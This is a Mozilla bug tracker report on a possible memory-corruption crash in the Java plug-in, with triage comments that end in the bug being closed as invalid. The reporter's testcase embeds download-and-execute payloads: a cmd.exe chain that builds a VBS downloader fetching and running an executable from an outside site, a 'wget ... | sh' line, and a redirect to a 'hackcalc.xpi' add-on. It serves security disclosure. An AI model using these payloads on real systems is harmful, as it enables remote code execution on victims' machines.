Bug 904053 (Closed)
Opened 11 years ago, closed 8 years ago
WINDOWS possible memory corruption with INNERHTML and applet code when onmousemove
Categories: Core Graveyard :: Plug-ins, defect
Tracking: Not tracked
Status: RESOLVED INVALID
People: Reporter: jordi.chancel, Unassigned
Details: 4 keywords, Whiteboard: potentially exploitable java bug
Attachments: 2 files, 4 obsolete files
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130729175331
Steps to reproduce:
https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
With this code, sometimes Mozilla Firefox doesn't crash, but sometimes it crashes with evidence of memory corruption.
In a test session I found a possible critical memory corruption on Windows
when you run document.getElementById("jo").innerHTML = "<iframe src='http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html'></iframe><div ><font color=white>=</font></div>"; on onmousemove (http://127.0.0.1/Vulnerability%20Research/test%20remote%20xpi%20cover%20by%20persistant%20select/hack.html leads to this code:
<applet width='1' height='1' code='Client.class' archive='Client.jar'>
<param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs http://www.alternativ-testing.fr/calc.exe %temp%\update.exe'>
<param name='windows2' value=''>
<param name='unix1' value="">
<param name='unix2' value="">
<param name='linux1' value="wget http://www.alternativ-testing.fr/calc.exe -O- | sh">
<param name='linux2' value="">
</applet>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Firefox 0day</title>
</head>
<body>
<body bgcolor="black" text="black" link="blue" vlink="purple" alink="red">
<p> </p>
</body>
<script language="JavaScript">navigator.geolocation.getCurrentPosition(LocationOK, LocationKO); function LocationOK(position)
{
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
alert('Location: ' + latitude + ', ' + longitude);
}
function LocationKO()
{
alert('You\'re lost !');
}
</script>
</body>
</html>
<script>
document.location ='./hackcalc.xpi';
</script>
Memory corruption is observed.
Actual results:
Mozilla Firefox crashes.
Expected results:
Mozilla Firefox crashes with evidence of memory corruption.
Updated by Reporter, 11 years ago
Attachment #788926 -
Attachment is obsolete: true
Updated, 11 years ago
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Comment 1 by Reporter, 11 years ago
Comment 2 by Reporter, 11 years ago
Comment 3 by Reporter, 11 years ago
Attachment #788940 -
Attachment is obsolete: true
Comment 4, 11 years ago
The stack in bp-30b0bd53-5ec5-45d5-9be5-5cfde2130812 looks like the crash
is in the Java plug-in (npjp2.dll).
-> Plug-ins for further triage
Comment 6 by Reporter, 11 years ago
Last version of Java. Please test the testcase locally and close/open Firefox for each test.
Flags: needinfo?(jordi.chancel)
Comment 7, 11 years ago
Jordi, please write the exact version so that future readers of this bug
know which version was meant by "last version". Thanks
Comment 8 by Reporter, 11 years ago
Java(TM) Platform SE 7 U25 10.25.2.17
Updated, 11 years ago
Flags: sec-bounty?
Updated, 11 years ago
Crash Signature: https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812 → [@ npjp2.dll@0xc2bc ]
Updated, 11 years ago
Attachment #789013 -
Attachment mime type: application/octet-stream → video/mp4
Updated, 11 years ago
Attachment #789018 -
Attachment mime type: application/octet-stream → application/java-archive
Comment 9 by Reporter, 11 years ago
Multiple crashes lead to an access violation read at address 0x00000004, but some crashes, like https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813 and https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812, lead to evidence of memory corruption.
Comment 10 by Reporter, 11 years ago
https://crash-stats.mozilla.com/report/index/a009099a-1fe5-4e07-94b3-365742130813
Crash Reason EXCEPTION_ACCESS_VIOLATION_READ
Crash Address 0x2f6d6f63
-----------
https://crash-stats.mozilla.com/report/index/30b0bd53-5ec5-45d5-9be5-5cfde2130812
Crash Reason EXCEPTION_ACCESS_VIOLATION_EXEC
Crash Address 0x2ffdb71
Updated, 11 years ago
Flags: needinfo?(mwobensmith)
Comment 11, 11 years ago
The steps to reproduce this bug are unclear. Please create steps, in the order to be executed. Is this test run locally or from a web server? What file is to be opened first?
I ran the files myself - both from a web server and locally. When run from a web server, I see the Firefox doorhanger dialogs for geolocation and XPI install repeatedly, but no crash. When run locally, I see a dialog that says: "Windows cannot find 'C:\Users\myusername\AppData\Local\Temp\winconfig.vbs'. Make sure you typed the name correctly, and then try again."
In both cases, I see no crash. I'm using the latest JRE 7u25 on Win7 as well.
Flags: needinfo?(mwobensmith)
Comment 12, 11 years ago
Jordi, Matt cannot reproduce this. Can you work with him to answer his questions? Thanks.
Flags: needinfo?(jordi.chancel)
Comment 13 by Reporter, 11 years ago
Go to 1.html and move the mouse on this page. If Firefox doesn't crash this time, please close Firefox, open it and retry all steps (move the mouse on 1.html).
I repeat, this testcase works only for Windows.
Attachment #789013 -
Attachment is obsolete: true
Attachment #789018 -
Attachment is obsolete: true
Flags: needinfo?(jordi.chancel)
Comment 14 by Reporter, 11 years ago
1.html should be opened locally to test the crash, but Firefox can also crash remotely, more rarely.
Comment 15 by Reporter, 11 years ago
Comment 16, 11 years ago
Jordi, what exact version of Windows 7 are you running? Go to command line, type "ver" and tell me what that says.
Comment 17, 11 years ago
The crash itself seems to be pretty common with Java, see https://crash-stats.mozilla.com/report/list?signature=npjp2.dll%400xc2bc
Comment 18, 11 years ago
I'm going to confirm that there does appear to be a real Java bug here based on the crash-stats reports in comment 17, even if we're having trouble reproducing with this particular testcase. All the crashes, even the ones Jordi links to, appear to be x86 and not 64-bit despite the user agent in comment 0.
Would be interesting to try in Chrome, although there could be some browser/plugin interaction that's involved rather than a pure Java bug.
This is probably worth blocklisting Java 1.7 u25 over. I know we're going to blocklist it in Fx26 anyway, but we could do it now based on this.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Flags: needinfo?(benjamin)
Keywords: sec-vector
Hardware: x86_64 → x86
Whiteboard: potentially exploitable java bug
Comment 19, 11 years ago
Has anyone filed this with Oracle? We're blocking Java in bug 914690 (Fx24+) and I don't think this bug changes that calculation at all.
Flags: needinfo?(benjamin)
Comment 20 by Reporter, 11 years ago
Doesn't crash on Google Chrome.
Comment 21, 11 years ago
This is a Java bug, so not eligible for our bounty.
Flags: sec-bounty? → sec-bounty-
Updated, 9 years ago
Group: core-security → dom-core-security
Comment 23, 8 years ago
I'm going to close this in our bug tracker, but leave it private since I don't see confirmation that this was ever reported to Oracle.
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → INVALID
Updated, 5 years ago
Group: dom-core-security
Updated, 2 years ago
Product: Core → Core Graveyard
Updated, 4 months ago
Keywords: reporter-external